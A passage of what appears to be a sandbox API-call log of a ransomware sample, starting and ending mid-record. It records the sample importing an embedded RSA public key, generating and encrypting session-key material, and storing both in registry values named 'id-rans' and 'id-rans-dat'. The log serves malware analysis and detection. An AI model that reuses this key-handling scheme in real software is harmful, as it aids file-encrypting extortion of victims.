lpString2="MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB" | out: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB") returned="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB" [0043.314] lstrcatW (in: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB", lpString2="-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----" [0043.314] GetProcessHeap () returned 0x410000 [0043.314] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e318 | out: hHeap=0x410000) returned 1 [0043.314] GetProcessHeap () returned 0x410000 [0043.314] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x464668 | out: hHeap=0x410000) returned 1 [0043.314] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x26d53c | out: phkResult=0x26d53c*=0x374) returned 0x0 [0043.314] lstrlenW (lpString="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----") returned 442 [0043.314] RegSetValueExW (in: hKey=0x374, lpValueName="id-rans", Reserved=0x0, dwType=0x1, lpData="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----", cbData=0x376 | out: lpData="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAlcL2ip2TbQLfCuNx8gbcgBmPTNOAgJWP44Gk15MpSBL/LFL4vaIiAHti0aYO+Gx91z+2lcwtHL4GowzPokP/Ek8fQ1aBKul0c2lDsldnh1W0QtHJcSWYYu9doev0wpBVf+ieWJ+Kvl1kXrNZTI3mBsgWT1wmZQ6Ab7tM4ulQ+t/ucrjaX1IVZy58KsOT+HmxDycLOP3Is8WjqC4XO/97XodpHxey9DVtqM4b6YZNiklhfeB14f0LOkEuKf/9FyMJvsWsJJpoiiP0ST9ESaoSRfFhDo/L0OF2q8tou3xlvZcDoHN8B+oCz/Qx0Jj4ekT0+eECpwzNfxNGRkqLTZhd3wIDAQAB-----END PUBLIC KEY-----") returned 0x0 [0043.314] RegCloseKey (hKey=0x374) returned 0x0 [0043.314] GetProcessHeap () returned 0x410000 [0043.314] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46e900 | out: hHeap=0x410000) returned 1 [0043.314] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA16k6OOt3TkejWowL6bgsobKavV5bP4qDX9JlZ6n4Ag7PhKsJ4KRfYd/j9EuvDPa4CiHYR5ypLqKajOQDrreUbiK9hHL6/VQJ9x4mh7+W9gm0WpfHZJPfe+xeXWCy50neqyoRmTU6VgoR4KUC4/5MuLB5xD+LnTEJLXGMIgkobylKIMPAjS0WIqkzsHpAlGAnjwWAYg33rnxAeoXwI0W9nzbjlposO1XUtxOreUu+MXOSeNxcm+bWElKfyl2XMsDLSp2nEdOHw/Eu2GTynQd+NVuSpx2kJtcGsK81jioVGGI9y+v7/+hV57ckEuhYIVpt+Zq5rPP82oy+VYoKl2mUAwIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x26efd8, pcbBinary=0x26d58c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x26efd8, pcbBinary=0x26d58c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0043.315] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x26efd8, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x26d574, pcbStructInfo=0x26d66c | out: pvStructInfo=0x26d574, pcbStructInfo=0x26d66c) returned 1 [0043.317] CryptAcquireContextW (in: phProv=0x26d558, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x26d558*=0x457fd8) returned 1 [0043.318] CryptImportPublicKeyInfo (in: hCryptProv=0x457fd8, dwCertEncodingType=0x1, pInfo=0x43e318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43e348*, PublicKey.cbData=0x10e, PublicKey.pbData=0x43e350*, PublicKey.cUnusedBits=0x0), phKey=0x26d554 | out: phKey=0x26d554*=0x447328) returned 1 [0043.319] CryptAcquireContextW (in: phProv=0x26d558, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x26d558*=0x457f50) returned 1 [0043.319] CryptImportPublicKeyInfo (in: hCryptProv=0x457f50, dwCertEncodingType=0x1, pInfo=0x43e318*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x43e348*, PublicKey.cbData=0x10e, PublicKey.pbData=0x43e350*, PublicKey.cUnusedBits=0x0), phKey=0x26d554 | out: phKey=0x26d554*=0x4479e8) returned 1 [0043.319] CryptAcquireContextW (in: phProv=0x26d548, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x26d548*=0x458060) returned 1 [0043.320] LocalFree (hMem=0x43e318) returned 0x0 [0043.320] CryptGenRandom (in: hProv=0x458060, dwLen=0x20, pbBuffer=0x26d6f0 | out: pbBuffer=0x26d6f0) returned 1 [0043.320] CryptGenRandom (in: hProv=0x458060, dwLen=0x8, pbBuffer=0x26d5c4 | out: pbBuffer=0x26d5c4) returned 1 [0043.320] GetProcessHeap () returned 0x410000 [0043.320] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4a8) returned 0x472108 [0043.320] VirtualFree (lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 0 [0043.321] CryptEncrypt (in: hKey=0x4479e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x26d578*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x26d578*=0x100) returned 1 [0043.321] GetProcessHeap () returned 0x410000 [0043.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5b0) returned 0x4725b8 [0043.321] GetProcessHeap () returned 0x410000 [0043.321] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x449be8 [0043.321] CryptEncrypt (in: hKey=0x4479e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x449be8*, pdwDataLen=0x26d5d0*=0x20, dwBufLen=0x100 | out: pbData=0x449be8*, pdwDataLen=0x26d5d0*=0x100) returned 1 [0043.321] CryptBinaryToStringW (in: pbBinary=0x4725b8, cbBinary=0x5b0, dwFlags=0x40000001, pszString=0x0, pcchString=0x26d538 | out: pszString=0x0, pcchString=0x26d538) returned 1 [0043.321] CryptBinaryToStringW (in: pbBinary=0x4725b8, cbBinary=0x5b0, dwFlags=0x40000001, pszString=0x1263190, pcchString=0x26d538 | out: pszString="9rAci/wLSw4DHF3VbwpmUmu4AjEuxf8Bcf5vKIslGx/VeYMkyLXFMTHyX/y2INDyVok5GwA3pS3zhB8JBp+lz4uF10xgHhPz5S1zhensJTXawzPi819GmuAC+qvdsPxIvE5hYR5YUS/2SVcArO8sRBk3RRUPi8MyEnTsGG9cIVRqADT4nh/Yhsg8HXICHHLH+Heq1hGMoBXBeQwt07PHl6hQ+Y3yBkdSpvrRdgzkRTNJTvPFNHDAuUwM/PtLs2tP34mEnotCwbDQWco/dlnQUN5L5DCsDNEVuRAMpYAFqNS6FuoRNqUUopepXz98frC3LHLr66y0sHj6KC9s/G6c7cUME4CDUjRGAaRtuoSZouqLQ4wJEziPAawSmsOQoLeJ2LLSE7e0DOc0gKo4+JJZ9nOW4qUd/sJyD+Vllm2rJ/ciTgqIASkkjkp9+b6HV7HfJvQfliwueLcJGA1B+eQg48VY/h2E8wihBtPCp1hK8nd+eDdtSIAU816USxSbjcsah7lnD6jrm72vlV5h1GCqjmMW7fcGUxzeX0Fc4evg3ZA3fhnJR+UzgmzVDiWRIsJuFz5FY5ZTLH0CQqJHQE44VeoGDvdWgtMHYjZXzh/CPDEzm3m7TvS+2o0uvXwNGq4WO6C2I0jfhAuq3UCTN2F0X+tDFEXDqGtHtdKFyv9OFA8VN95LJ56OTfjSvQkobUkwlplSCB17JtggC9cLTtoiHWAfpw9VsiXzjFpRV4WhCyJi7m8G0CQBLEC7IK9wAy9yOVWP0BZlH+vger+5u5kEKROl6NgvqvWBJ0VrvG5tw+wSeAUplBQH620SnoR4R36APlMStmFKnMB2NXDqBvK/fZ+Vyho8IwuIbiOTQzx0wYdaXMAy7U4ViDDu0DbsroEXyR1Cc958uG1b9lE+Vvi8B7mbtAlQdsbMZFHWO0rzh84dco9xKrRlfArHqiVLuFuBpOP1t66ahHu3lGjL5IH9kG9ZSeiFGp5CcMTLsvZOLbeCNaQT4k8xpG91/a2v/uOGdm7Sp7kmwj0/RKEJ94SiE4yASzPb3vaA9bXGRcaWEIZiAdbHCGmXr3eRBIjOn7NhaXlstTd53SIntDGeNNk+O7tvRjPom33YL+cq8YMMeG8wZY5H7p3XJEKof5CR1zJvd6Llrj4kWZ6anNX/zsnnd/41R1A5n0Ff4xp9eEEZXa4zdPG9Qpgq0fy8+76m2tsO2w+1U5YGb980lX0R4JA2wyRGM0l1QFW8P3Re6/cshU6OBkVR8aB/ozA6aMioaIyDTXTeqgMiBYQPN3dYmv+KVFP0js6eqeALhdNihNcRKKpmX9dxLjnAA0a3a2A4xlqD+3/NfuHLJG3p0XSLaGiVT4Y+nmuWTvFheunk9x4R8vW+4s1mrApmpLaE/QVJp40L5ssylZZ1GwfSjZf6qErw/bDBcL70nwXtiOmq2nqNZ0yfRWVYD15olYy1UQddeiYU8MUmJzpF5Wqdn/X+lqoN336AbGIY0F+10z5ZqVsy3pc1X4XGlseWHx5qMcTVCVLjXEnlxOn5HiAZJG3BEf7SprkC2piQZbCg2FYYBnOpTemA2o72Tjt9GcY57CA3M1V6yiSLFNQrL+k9n+mdiWz2onoQkp7G3lU5Jbk0aNE5f614Pn9DMmOrfa03/NLEanEWjkTHAFtokbPO+nmsLe/CM+N+7jl5QeWXHuz+nASu19cmaxmN38h5rwAld9tiiTffhwpkrwQtId5amR/ar2jMDHTaVRmVOINYo3dfekU+99jK536/c6GcKbZ9X7uX4vdaPOkh8TWTUy5WmEydzwWpcbxTdItmfmJ0rVIz60K0ur7Oi270WgZ4CEklFqsLgK7WxFS8V8ZKGheT5nr9fvexyIxchQqRCUXzd8WbTSOnTNFy5cE37EHTxSOt9COgLW5KAh/FHel4gnjk0A43umug8A==", pcchString=0x26d538) returned 1 [0043.322] GetProcessHeap () returned 0x410000 [0043.322] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472108 | out: hHeap=0x410000) returned 1 [0043.322] GetProcessHeap () returned 0x410000 [0043.322] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449be8 | out: hHeap=0x410000) returned 1 [0043.322] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0x26d53c | out: phkResult=0x26d53c*=0x374) returned 0x0 [0043.322] lstrlenW (lpString="9rAci/wLSw4DHF3VbwpmUmu4AjEuxf8Bcf5vKIslGx/VeYMkyLXFMTHyX/y2INDyVok5GwA3pS3zhB8JBp+lz4uF10xgHhPz5S1zhensJTXawzPi819GmuAC+qvdsPxIvE5hYR5YUS/2SVcArO8sRBk3RRUPi8MyEnTsGG9cIVRqADT4nh/Yhsg8HXICHHLH+Heq1hGMoBXBeQwt07PHl6hQ+Y3yBkdSpvrRdgzkRTNJTvPFNHDAuUwM/PtLs2tP34mEnotCwbDQWco/dlnQUN5L5DCsDNEVuRAMpYAFqNS6FuoRNqUUopepXz98frC3LHLr66y0sHj6KC9s/G6c7cUME4CDUjRGAaRtuoSZouqLQ4wJEziPAawSmsOQoLeJ2LLSE7e0DOc0gKo4+JJZ9nOW4qUd/sJyD+Vllm2rJ/ciTgqIASkkjkp9+b6HV7HfJvQfliwueLcJGA1B+eQg48VY/h2E8wihBtPCp1hK8nd+eDdtSIAU816USxSbjcsah7lnD6jrm72vlV5h1GCqjmMW7fcGUxzeX0Fc4evg3ZA3fhnJR+UzgmzVDiWRIsJuFz5FY5ZTLH0CQqJHQE44VeoGDvdWgtMHYjZXzh/CPDEzm3m7TvS+2o0uvXwNGq4WO6C2I0jfhAuq3UCTN2F0X+tDFEXDqGtHtdKFyv9OFA8VN95LJ56OTfjSvQkobUkwlplSCB17JtggC9cLTtoiHWAfpw9VsiXzjFpRV4WhCyJi7m8G0CQBLEC7IK9wAy9yOVWP0BZlH+vger+5u5kEKROl6NgvqvWBJ0VrvG5tw+wSeAUplBQH620SnoR4R36APlMStmFKnMB2NXDqBvK/fZ+Vyho8IwuIbiOTQzx0wYdaXMAy7U4ViDDu0DbsroEXyR1Cc958uG1b9lE+Vvi8B7mbtAlQdsbMZFHWO0rzh84dco9xKrRlfArHqiVLuFuBpOP1t66ahHu3lGjL5IH9kG9ZSeiFGp5CcMTLsvZOLbeCNaQT4k8xpG91/a2v/uOGdm7Sp7kmwj0/RKEJ94SiE4yASzPb3vaA9bXGRcaWEIZiAdbHCGmXr3eRBIjOn7NhaXlstTd53SIntDGeNNk+O7tvRjPom33YL+cq8YMMeG8wZY5H7p3XJEKof5CR1zJvd6Llrj4kWZ6anNX/zsnnd/41R1A5n0Ff4xp9eEEZXa4zdPG9Qpgq0fy8+76m2tsO2w+1U5YGb980lX0R4JA2wyRGM0l1QFW8P3Re6/cshU6OBkVR8aB/ozA6aMioaIyDTXTeqgMiBYQPN3dYmv+KVFP0js6eqeALhdNihNcRKKpmX9dxLjnAA0a3a2A4xlqD+3/NfuHLJG3p0XSLaGiVT4Y+nmuWTvFheunk9x4R8vW+4s1mrApmpLaE/QVJp40L5ssylZZ1GwfSjZf6qErw/bDBcL70nwXtiOmq2nqNZ0yfRWVYD15olYy1UQddeiYU8MUmJzpF5Wqdn/X+lqoN336AbGIY0F+10z5ZqVsy3pc1X4XGlseWHx5qMcTVCVLjXEnlxOn5HiAZJG3BEf7SprkC2piQZbCg2FYYBnOpTemA2o72Tjt9GcY57CA3M1V6yiSLFNQrL+k9n+mdiWz2onoQkp7G3lU5Jbk0aNE5f614Pn9DMmOrfa03/NLEanEWjkTHAFtokbPO+nmsLe/CM+N+7jl5QeWXHuz+nASu19cmaxmN38h5rwAld9tiiTffhwpkrwQtId5amR/ar2jMDHTaVRmVOINYo3dfekU+99jK536/c6GcKbZ9X7uX4vdaPOkh8TWTUy5WmEydzwWpcbxTdItmfmJ0rVIz60K0ur7Oi270WgZ4CEklFqsLgK7WxFS8V8ZKGheT5nr9fvexyIxchQqRCUXzd8WbTSOnTNFy5cE37EHTxSOt9COgLW5KAh/FHel4gnjk0A43umug8A==") returned 1944 [0043.322] RegSetValueExW (in: hKey=0x374, lpValueName="id-rans-dat", Reserved=0x0, dwType=0x1, lpData="9rAci/wLSw4DHF3VbwpmUmu4AjEuxf8Bcf5vKIslGx/VeYMkyLXFMTHyX/y2INDyVok5GwA3pS3zhB8JBp+lz4uF10xgHhPz5S1zhensJTXawzPi819GmuAC+qvdsPxIvE5hYR5YUS/2SVcArO8sRBk3RRUPi8MyEnTsGG9cIVRqADT4nh/Yhsg8HXICHHLH+Heq1hGMoBXBeQwt07PHl6hQ+Y3yBkdSpvrRdgzkRTNJTvPFNHDAuUwM/PtLs2tP34mEnotCwbDQWco/dlnQUN5L5DCsDNEVuRAMpYAFqNS6FuoRNqUUopepXz98frC3LHLr66y0sHj6KC9s/G6c7cUME4CDUjRGAaRtuoSZouqLQ4wJEziPAawSmsOQoLeJ2LLSE7e0DOc0gKo4+JJZ9nOW4qUd/sJyD+Vllm2rJ/ciTgqIASkkjkp9+b6HV7HfJvQfliwueLcJGA1B+eQg48VY/h2E8wihBtPCp1hK8nd+eDdtSIAU816USxSbjcsah7lnD6jrm72vlV5h1GCqjmMW7fcGUxzeX0Fc4evg3ZA3fhnJR+UzgmzVDiWRIsJuFz5FY5ZTLH0CQqJHQE44VeoGDvdWgtMHYjZXzh/CPDEzm3m7TvS+2o0uvXwNGq4WO6C2I0jfhAuq3UCTN2F0X+tDFEXDqGtHtdKFyv9OFA8VN95LJ56OTfjSvQkobUkwlplSCB17JtggC9cLTtoiHWAfpw9VsiXzjFpRV4WhCyJi7m8G0CQBLEC7IK9wAy9yOVWP0BZlH+vger+5u5kEKROl6NgvqvWBJ0VrvG5tw+wSeAUplBQH620SnoR4R36APlMStmFKnMB2NXDqBvK/fZ+Vyho8IwuIbiOTQzx0wYdaXMAy7U4ViDDu0DbsroEXyR1Cc958uG1b9lE+Vvi8B7mbtAlQdsbMZFHWO0rzh84dco9xKrRlfArHqiVLuFuBpOP1t66ahHu3lGjL5IH9kG9ZSeiFGp5CcMTLsvZOLbeCNaQT4k8xpG91/a2v/uOGdm7Sp7kmwj0/RKEJ94SiE4yASzPb3vaA9bXGRcaWEIZiAdbHCGmXr3eRBIjOn7NhaXlstTd53SIntDGeNNk+O7tvRjPom33YL+cq8YMMeG8wZY5H7p3XJEKof5CR1zJvd6Llrj4kWZ6anNX/zsnnd/41R1A5n0Ff4xp9eEEZXa4zdPG9Qpgq0fy8+76m2tsO2w+1U5YGb980lX0R4JA2wyRGM0l1QFW8P3Re6/cshU6OBkVR8aB/ozA6aMioaIyDTXTeqgMiBYQPN3dYmv+KVFP0js6eqeALhdNihNcRKKpmX9dxLjnAA0a3a2A4xlqD+3/NfuHLJG3p0XSLaGiVT4Y+nmuWTvFheunk9x4R8vW+4s1mrApmpLaE/QVJp40L5ssylZZ1GwfSjZf6qErw/bDBcL70nwXtiOmq2nqNZ0yfRWVYD15olYy1UQddeiYU8MUmJzpF5Wqdn/X+lqoN336AbGIY0F+10z5ZqVsy3pc1X4XGlseWHx5qMcTVCVLjXEnlxOn5HiAZJG3BEf7SprkC2piQZbCg2FYYBnOpTemA2o72Tjt9GcY57CA3M1V6yiSLFNQrL+k9n+mdiWz2onoQkp7G3lU5Jbk0aNE5f614Pn9DMmOrfa03/NLEanEWjkTHAFtokbPO+nmsLe/CM+N+7jl5QeWXHuz+nASu19cmaxmN38h5rwAld9tiiTffhwpkrwQtId5amR/ar2jMDHTaVRmVOINYo3dfekU+99jK536/c6GcKbZ9X7uX4vdaPOkh8TWTUy5WmEydzwWpcbxTdItmfmJ0rVIz60K0ur7Oi270WgZ4CEklFqsLgK7WxFS8V8ZKGheT5nr9fvexyIxchQqRCUXzd8WbTSOnTNFy5cE37EHTxSOt9COgLW5KAh/FHel4gnjk0A43umug8A==", cbData=0xf30 | out: lpData="9rAci/wLSw4DHF3VbwpmUmu4AjEuxf8Bcf5vKIslGx/VeYMkyLXFMTHyX/y2INDyVok5GwA3pS3zhB8JBp+lz4uF10xgHhPz5S1zhensJTXawzPi819GmuAC+qvdsPxIvE5hYR5YUS/2SVcArO8sRBk3RRUPi8MyEnTsGG9cIVRqADT4nh/Yhsg8HXICHHLH+Heq1hGMoBXBeQwt07PHl6hQ+Y3yBkdSpvrRdgzkRTNJTvPFNHDAuUwM/PtLs2tP34mEnotCwbDQWco/dlnQUN5L5DCsDNEVuRAMpYAFqNS6FuoRNqUUopepXz98frC3LHLr66y0sHj6KC9s/G6c7cUME4CDUjRGAaRtuoSZouqLQ4wJEziPAawSmsOQoLeJ2LLSE7e0DOc0gKo4+JJZ9nOW4qUd/sJyD+Vllm2rJ/ciTgqIASkkjkp9+b6HV7HfJvQfliwueLcJGA1B+eQg48VY/h2E8wihBtPCp1hK8nd+eDdtSIAU816USxSbjcsah7lnD6jrm72vlV5h1GCqjmMW7fcGUxzeX0Fc4evg3ZA3fhnJR+UzgmzVDiWRIsJuFz5FY5ZTLH0CQqJHQE44VeoGDvdWgtMHYjZXzh/CPDEzm3m7TvS+2o0uvXwNGq4WO6C2I0jfhAuq3UCTN2F0X+tDFEXDqGtHtdKFyv9OFA8VN95LJ56OTfjSvQkobUkwlplSCB17JtggC9cLTtoiHWAfpw9VsiXzjFpRV4WhCyJi7m8G0CQBLEC7IK9wAy9yOVWP0BZlH+vger+5u5kEKROl6NgvqvWBJ0VrvG5tw+wSeAUplBQH620SnoR4R36APlMStmFKnMB2NXDqBvK/fZ+Vyho8IwuIbiOTQzx0wYdaXMAy7U4ViDDu0DbsroEXyR1Cc958uG1b9lE+Vvi8B7mbtAlQdsbMZFHWO0rzh84dco9xKrRlfArHqiVLuFuBpOP1t66ahHu3lGjL5IH9kG9ZSeiFGp5CcMTLsvZOLbeCNaQT4k8xpG91/a2v/uOGdm7Sp7kmwj0/RKEJ94SiE4yASzPb3vaA9bXGRcaWEIZiAdbHCGmXr3eRBIjOn7NhaXlstTd53SIntDGeNNk+O7tvRjPom33YL+cq8YMMeG8wZY5H7p3XJEKof5CR1zJvd6Llrj4kWZ6anNX/zsnnd/41R1A5n0Ff4xp9eEEZXa4zdPG9Qpgq0fy8+76m2tsO2w+1U5YGb980lX0R4JA2wyRGM0l1QFW8P3Re6/cshU6OBkVR8aB/ozA6aMioaIyDTXTeqgMiBYQPN3dYmv+KVFP0js6eqeALhdNihNcRKKpmX9dxLjnAA0a3a2A4xlqD+3/NfuHLJG3p0XSLaGiVT4Y+nmuWTvFheunk9x4R8vW+4s1mrApmpLaE/QVJp40L5ssylZZ1GwfSjZf6qErw/bDBcL70nwXtiOmq2nqNZ0yfRWVYD15olYy1UQddeiYU8MUmJzpF5Wqdn/X+lqoN336AbGIY0F+10z5ZqVsy3pc1X4XGlseWHx5qMcTVCVLjXEnlxOn5HiAZJG3BEf7SprkC2piQZbCg2FYYBnOpTemA2o72Tjt9GcY57CA3M1V6yiSLFNQrL+k9n+mdiWz2onoQkp7G3lU5Jbk0aNE5f614Pn9DMmOrfa03/NLEanEWjkTHAFtokbPO+nmsLe/CM+N+7jl5QeWXHuz+nASu19cmaxmN38h5rwAld9tiiTffhwpkrwQtId5amR/ar2jMDHTaVRmVOINYo3dfekU+99jK536/c6GcKbZ9X7uX4vdaPOkh8TWTUy5WmEydzwWpcbxTdItmfmJ0rVIz60K0ur7Oi270WgZ4CEklFqsLgK7WxFS8V8ZKGheT5nr9fvexyIxchQqRCUXzd8WbTSOnTNFy5cE37EHTxSOt9COgLW5KAh/FHel4gnjk0A43umug8A==") returned 0x0 [0043.322] RegCloseKey (hKey=0x374) returned 0x0 [0043.322] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x26d550 | out: phkResult=0x26d550*=0x374) returned 0x0 [0043.322] VirtualAlloc (lpAddress=0x0, dwSize=0x2000, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0043.323] RegQueryValueExW (in: hKey=0x374, lpValueName="id-rans", lpReserved=0x0, lpType=0x0, lpData=0x530000, lpcbData=0x26d590*=0x2000 | out: lpType=0x0, lpData=0x530000*=0x2d, lpcbData=0x26d590*=0x376) returned 0x0 [0043.323] RegCloseKey (hKey=0x374) returned 0x0 [0043.323] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC 